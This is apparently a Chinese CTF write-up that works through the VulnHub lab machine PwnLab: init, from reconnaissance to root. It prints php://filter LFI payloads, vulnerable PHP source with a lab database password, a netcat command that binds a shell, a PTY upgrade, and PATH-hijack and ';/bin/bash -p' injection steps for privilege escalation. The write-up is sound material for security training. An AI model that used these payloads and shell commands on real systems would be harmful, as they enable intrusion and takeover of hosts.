VulnHub靶场 PwnLab: init 渗透测试思路
0x00 靶机链接
PwnLab: init ~ VulnHub
0x01 信息收集
端口扫描
image-20240823090207990目录扫描
image-202408230904272360x02 web测试
访问网页
image-20240823090547166点击登陆发现有一个page参数,尝试使用伪协议读取页面内容
?page=php://filter/read=convert.base64-encode/resource=index
?page=php://filter/read=convert.base64-encode/resource=config
?page=php://filter/read=convert.base64-encode/resource=upload
?page=php://filter/read=convert.base64-encode/resource=login分别解码得到index.php源码,发现这里存在一个文件包含漏洞
<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
<?php
if (isset($_GET['page']))
{
include($_GET['page'].".php");
}
else
{
echo "Use this server to upload and share image files inside the intranet";
}
?>
</center>
</body>
</html> 这里发现了一个文件包含漏洞
upload.php源码
<?php
session_start();
if (!isset($_SESSION['user'])) { die('You must be log in.'); }
?>
<html>
<body>
<form action='' method='post' enctype='multipart/form-data'>
<input type='file' name='file' id='file' />
<input type='submit' name='submit' value='Upload'/>
</form>
</body>
</html>
<?php
if(isset($_POST['submit'])) {
if ($_FILES['file']['error'] <= 0) {
$filename = $_FILES['file']['name'];
$filetype = $_FILES['file']['type'];
$uploaddir = 'upload/';
$file_ext = strrchr($filename, '.');
$imageinfo = getimagesize($_FILES['file']['tmp_name']);
$whitelist = array(".jpg",".jpeg",".gif",".png");
if (!(in_array($file_ext, $whitelist))) {
die('Not allowed extension, please upload images only.');
}
if(strpos($filetype,'image') === false) {
die('Error 001');
}
if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {
die('Error 002');
}
if(substr_count($filetype, '/')>1){
die('Error 003');
}
$uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;
if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
echo "<img src="".$uploadfile.""><br />";
} else {
die('Error 4');
}
}
}
?>是个白名单验证只能上传图片马,然后使用index.php的文件包含漏洞getshell,这里需要登陆才能上传文件
利用伪协议得到config.php源码,得到数据库密码,3306端口开放
<?php
$server = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?> 连接数据库得到登陆密码,这是是使用的base64编码,得到了三个用户以及密码,登陆上传图片马
image-20240823092114297使用gif上传图片马成功
image-20240823093128078根据upload.php源代码得到文件保存在upload/a7200b4bac77e8804f9e48304a92b6d9.gif
Getshell
蚁剑连接图片马得到shell
image-20240823094618416使用nc反弹shell
nc -lvp 7777 -e /bin/bashkali成功连接
image-20240823095047977使用Python获得一个完整的shell
image-20240823095315168python -c 'import pty; pty.spawn("/bin/bash")'
ctrl z
stty raw -echo;fg
reset
export SHELL=bash
export TERM=xterm0x03 提权
查看/etc/passwd文件发现一下三个用户,尝试使用刚才数据库中获得的密码登陆成功
image-20240823095750498kent:登陆成功,没有发现有用价值mike:登陆失败kane:登陆成功。发现用户目录存在文件msgmike有执行权限
查看msgmike内容,发现如下
image-20240823100758305执行命令时,会从PATH环境变量中寻找这个命令所以我们可以设置环境变量
image-20240823101614683执行后提权到mike
image-20240823101742769然后在mike家目录发现msg2root文件,打开IDA分析得知运行程序,输入;/bin/bash -p,就可以得到root权限
image-20240823103011523
image-20240823103354912查看root目录下的flag.txt文件
